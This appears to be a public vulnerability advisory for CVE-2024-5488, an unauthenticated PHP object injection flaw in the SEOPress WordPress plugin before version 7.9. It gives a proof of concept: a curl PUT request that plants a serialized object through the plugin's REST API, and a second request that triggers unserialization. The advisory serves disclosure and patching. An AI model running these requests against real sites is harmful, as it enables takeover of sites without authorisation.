SEOPress < 7.9 – Unauthenticated Object Injection | CVE 2024-5488 | Plugin Vulnerabilities

Description

The plugin does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.

Proof of Concept

1) To save the gadget chain. Replace $POSTID and "superadmin" with a published post ID and the site administrator's username:

curl -X PUT --url 'http://vulnerable-site.tld/wp-json/seopress/v1/posts/$POSTID/title-description-metas' --data 'title=O:8:"StdClass":0:{};' -H 'Authorization: Basic '`echo -n 'superadmin:invalidpassword' | base64`

2) Access http://vulnerable-site.tld/wp-json/seopress/v1/posts/$POSTID/content-analysis to unserialize the malicious gadget chain.

Affects Plugins

Fixed in 7.9

References

CVE

URL

https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Marc Montpas

Submitter

Marc Montpas

Submitter website

https://wpscan.com

Submitter twitter

Verified

Yes

WPVDB ID

28507376-ded0-4e1a-b2fc-2182895aa14c

Timeline

Publicly Published

2024-06-18 (about 1 year ago)

Added

2024-06-18 (about 1 year ago)

Last Updated

2024-06-25 (about 1 year ago)

Other

Published

Title

Published

2023-03-27

Title

WP Meta SEO < 4.5.5 - Author+ PHAR Deserialization

Published

2018-09-21

Title

Blog2Social <= 5.0.0 - PHP Obj Injection

Published

2025-05-22

Title

Car Dealer <= 1.6.6 - Unauthenticated PHP Object Injection

Published

2025-03-04

Title

VEDA - MultiPurpose WordPress Theme <= 4.2 - Authenticated (Subscriber+) PHP Object Injection

Published

2025-09-04

Title

Knowledge Base <= 2.9 - Authenticated (Subscriber+) PHP Object Injection